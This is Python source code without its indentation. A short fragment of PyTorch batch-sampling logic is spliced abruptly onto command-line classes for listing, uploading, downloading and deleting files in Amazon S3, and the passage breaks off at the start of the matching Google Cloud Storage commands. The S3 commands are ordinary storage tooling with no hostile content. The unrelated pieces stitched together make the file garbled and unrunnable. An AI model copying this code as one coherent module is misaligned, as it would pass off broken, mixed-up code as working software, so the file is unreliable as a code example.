ids = self.ids[split][keys]
# Check whether the final index exceeds the number of sequences
if final_idx < num_sentences:
idx_range = range(start_idx, final_idx)
idxs = torch.LongTensor(idx_range)
# Update offset for next access of this key
self.offset[split][keys] += bs
else:
# If it is, take only the remaining examples and reset the offset
idx_range = range(start_idx, num_sentences)
idxs = torch.LongTensor(idx_range)
self.offset[split][keys] = 0
if keys in self.unfilled[split]:
# This key has been fully visited, so remove it from the unfilled set
self.unfilled[split].remove(keys)
if self.is_cuda:
idxs = idxs.cuda(cfg.device)
s = sorted(context.keys())
# Select the correct examples using the sampled indices
ss = sentence.index_select(0, idxs)
sl = sentence_lengths.index_select(0, idxs)
cs = {cn: context[cn].index_select(0, idxs) for cn in s}
cl = {cn: context_lengths[cn].index_select(0, idxs) for cn in s}
e = ent.index_select(0, idxs)
_register_command(subparsers, "delete-dir", S3DeleteDirCommand)
@staticmethod
def execute(parser, args):
parser.print_help()
class S3InfoCommand(Command):
"""Get information about files/folders in S3.
Examples:
# Get file info
eta s3 info <cloud-path> [...]
# Get folder info
eta s3 info --folder <cloud-path> [...]
"""
@staticmethod
def setup(parser):
parser.add_argument(
"paths",
nargs="+",
metavar="CLOUD_PATH",
help="the path(s) of the files of interest in S3",
)
parser.add_argument(
"-f",
"--folder",
action="store_true",
help="whether the provided" "paths are folders, not files",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.folder:
metadata = [client.get_folder_metadata(p) for p in args.paths]
_print_s3_folder_info_table(metadata)
return
metadata = [client.get_file_metadata(p) for p in args.paths]
_print_s3_file_info_table(metadata)
class S3ListCommand(Command):
"""List contents of an S3 folder.
Examples:
# List folder contents
eta s3 list s3://<bucket>/<prefix>
# List folder contents recursively
eta s3 list s3://<bucket>/<prefix> --recursive
# List folder contents according to the given query
eta s3 list s3://<bucket>/<prefix>
[--recursive]
[--limit <limit>]
[--search [<field><operator>]<str>[,...]]
[--sort-by <field>]
[--ascending]
[--count]
# List the last 10 modified files that contain "test" in any field
eta s3 list s3://<bucket>/<prefix> \\
--search test --limit 10 --sort-by last_modified
# List files whose size is 10-20MB, from smallest to largest
eta s3 list s3://<bucket>/<prefix> \\
--search 'size>10MB,size<20MB' --sort-by size --ascending
# List files that were uploaded before November 26th, 2019, recursively
# traversing subfolders, and display the count
eta s3 list s3://<bucket>/<prefix> \\
--recursive --search 'last modified<2019-11-26' --count
Search syntax:
The generic search syntax is:
--search [<field><operator>]<str>[,...]
where:
<field> an optional field name on which to search
<operator> an optional operator to use when evaluating matches
<str> the search string
If <field><operator> is omitted, the search will match any records for
which any column contains the given search string.
Multiple searches can be specified as a comma-separated list. Records
must match all searches in order to appear in the search results.
The supported fields are:
field type description
------------- -------- ------------------------------------------
bucket string the name of the bucket
name string the name of the object in the bucket
size bytes the size of the object
type string the MIME type of the object
last modified datetime the date that the object was last modified
Fields are case insensitive, and underscores can be used in place of
spaces.
The meanings of the operators are as follows:
operator type description
--------- ---------- --------------------------------------------------
: contains the field contains the search string
== comparison the search string is equal to the field
< comparison the search string is less than the field
<= comparison the search string is less or equal to the field
> comparison the search string is greater than the field
>= comparison the search string is greater or equal to the field
For contains (":") queries, the search/record values are parsed as
follows:
type description
-------- --------------------------------------------------------------
string the search and record are treated as strings
bytes the search is treated as a string, and the record is converted
to a human-readable bytes string
datetime the search is treated as a string, and the record is rendered
as a string in "%Y-%m-%d %H:%M:%S %Z" format in local timezone
For comparison ("==", "<", "<=", ">", ">=") queries, the search/record
values are parsed as follows:
type description
-------- ------------------------------------------------------------
string the search and record are treated as strings
bytes the search must be a human-readable bytes string, which is
converted to numeric bytes for comparison with the record
datetime the search must be an ISO time string, which is converted to
a datetime for comparison with the record. If no timezone is
included in the search, local time is assumed
You can include special characters (":", "=", "<", ">", ",") in search
strings by escaping them with "\\".
"""
@staticmethod
def setup(parser):
parser.add_argument(
"folder", metavar="CLOUD_DIR", help="the S3 folder to list"
)
parser.add_argument(
"-r",
"--recursive",
action="store_true",
help="whether to " "recursively list the contents of subfolders",
)
parser.add_argument(
"-l",
"--limit",
metavar="LIMIT",
type=int,
default=-1,
help="limit the number of files listed",
)
parser.add_argument(
"-s",
"--search",
metavar="SEARCH",
help="search to limit results when listing files",
)
parser.add_argument(
"--sort-by",
metavar="FIELD",
help="field to sort by when listing files",
)
parser.add_argument(
"--ascending",
action="store_true",
help="whether to sort in ascending order",
)
parser.add_argument(
"-c",
"--count",
action="store_true",
help="whether to show the number of files in the list",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
metadata = client.list_files_in_folder(
args.folder, recursive=args.recursive, return_metadata=True
)
metadata = _filter_records(
metadata,
args.limit,
args.search,
args.sort_by,
args.ascending,
_S3_SEARCH_FIELDS_MAP,
)
_print_s3_file_info_table(metadata, show_count=args.count)
class S3UploadCommand(Command):
"""Upload file to S3.
Examples:
# Upload file
eta s3 upload <local-path> <cloud-path>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"local_path",
metavar="LOCAL_PATH",
help="the path to the file to " "upload",
)
parser.add_argument(
"cloud_path",
metavar="CLOUD_PATH",
help="the path to the S3 " "object to create",
)
parser.add_argument(
"-t",
"--content-type",
metavar="TYPE",
help="an optional content "
"type of the file. By default, the type is guessed from the "
"filename",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
print("Uploading '%s' to '%s'" % (args.local_path, args.cloud_path))
client.upload(
args.local_path, args.cloud_path, content_type=args.content_type
)
class S3UploadDirectoryCommand(Command):
"""Upload directory to S3.
Examples:
# Upload directory
eta s3 upload-dir <local-dir> <cloud-dir>
# Upload-sync directory
eta s3 upload-dir --sync <local-dir> <cloud-dir>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"local_dir",
metavar="LOCAL_DIR",
help="the directory of files to " "upload",
)
parser.add_argument(
"cloud_dir",
metavar="CLOUD_DIR",
help="the S3 directory to " "upload into",
)
parser.add_argument(
"--sync",
action="store_true",
help="whether to sync the S3 "
"directory to match the contents of the local directory",
)
parser.add_argument(
"-o",
"--overwrite",
action="store_true",
help="whether to "
"overwrite existing files; only valid in `--sync` mode",
)
parser.add_argument(
"-r",
"--recursive",
action="store_true",
help="whether to "
"recursively upload the contents of subdirecotires",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.sync:
client.upload_dir_sync(
args.local_dir,
args.cloud_dir,
overwrite=args.overwrite,
recursive=args.recursive,
)
else:
client.upload_dir(
args.local_dir, args.cloud_dir, recursive=args.recursive
)
class S3DownloadCommand(Command):
"""Download file from S3.
Examples:
# Download file
eta s3 download <cloud-path> <local-path>
# Print download to stdout
eta s3 download <cloud-path> --print
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_path",
metavar="CLOUD_PATH",
help="the S3 object to " "download",
)
parser.add_argument(
"local_path",
nargs="?",
metavar="LOCAL_PATH",
help="the path to "
"which to write the downloaded file. If not provided, the "
"filename of the file in S3 is used",
)
parser.add_argument(
"--print",
action="store_true",
help="whether to print the "
"download to stdout. If true, a file is NOT written to disk",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.print:
print(client.download_bytes(args.cloud_path))
else:
local_path = args.local_path
if local_path is None:
local_path = client.get_file_metadata(args.cloud_path)["name"]
print("Downloading '%s' to '%s'" % (args.cloud_path, local_path))
client.download(args.cloud_path, local_path)
class S3DownloadDirectoryCommand(Command):
"""Download directory from S3.
Examples:
# Download directory
eta s3 download-dir <cloud-folder> <local-dir>
# Download directory sync
eta s3 download-dir --sync <cloud-folder> <local-dir>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_dir",
metavar="CLOUD_DIR",
help="the S3 directory to " "download",
)
parser.add_argument(
"local_dir",
metavar="LOCAL_DIR",
help="the directory to which to " "download files into",
)
parser.add_argument(
"--sync",
action="store_true",
help="whether to sync the local"
"directory to match the contents of the S3 directory",
)
parser.add_argument(
"-o",
"--overwrite",
action="store_true",
help="whether to "
"overwrite existing files; only valid in `--sync` mode",
)
parser.add_argument(
"-r",
"--recursive",
action="store_true",
help="whether to "
"recursively download the contents of subdirecotires",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.sync:
client.download_dir_sync(
args.cloud_dir,
args.local_dir,
overwrite=args.overwrite,
recursive=args.recursive,
)
else:
client.download_dir(
args.cloud_dir, args.local_dir, recursive=args.recursive
)
class S3DeleteCommand(Command):
"""Delete file from S3.
Examples:
# Delete file
eta s3 delete <cloud-path>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_path", metavar="CLOUD_PATH", help="the S3 file to delete"
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
print("Deleting '%s'" % args.cloud_path)
client.delete(args.cloud_path)
class S3DeleteDirCommand(Command):
"""Delete directory from S3.
Examples:
# Delete directory
eta s3 delete-dir <cloud-dir>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_dir", metavar="CLOUD_DIR", help="the S3 folder to delete"
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
print("Deleting '%s'" % args.cloud_dir)
client.delete_folder(args.cloud_dir)
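# A hypothetical end-to-end session with the S3 commands defined above
# (bucket and paths are placeholders):
#
#   eta s3 upload ./report.csv s3://my-bucket/reports/report.csv
#   eta s3 info s3://my-bucket/reports/report.csv
#   eta s3 list s3://my-bucket/reports --recursive --count
#   eta s3 download s3://my-bucket/reports/report.csv ./report-copy.csv
#   eta s3 delete s3://my-bucket/reports/report.csv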
class GCSCommand(Command):
"""Tools for working with Google Cloud Storage."""
@staticmethod
def setup(parser):
subparsers = parser.add_subparsers(title="available commands")
_register_command(subparsers, "info", GCSInfoCommand)
_register_command(subparsers, "list", GCSListCommand)
_register_command(subparsers, "upload", GCSUploadCommand)
_register_command(subparsers, "upload-dir", GCSUploadDirectoryCommand)
_register_command(subparsers, "download", GCSDownloadCommand)
_register_command(
subparsers, "download-dir", GCSDownloadDirectoryCommand
)
_register_command(subparsers, "delete", GCSDeleteCommand)
_register_command(subparsers, "delete-dir", GCSDeleteDirCommand)
@staticmethod
def execute(parser, args):
parser.print_help()
class GCSInfoCommand(Command):
"""Get information about files/folders in GCS.
Examples:
# Get file info
eta gcs info <cloud-path> [...]
# Get folder info
eta gcs info --folder <cloud-path> [...]
"""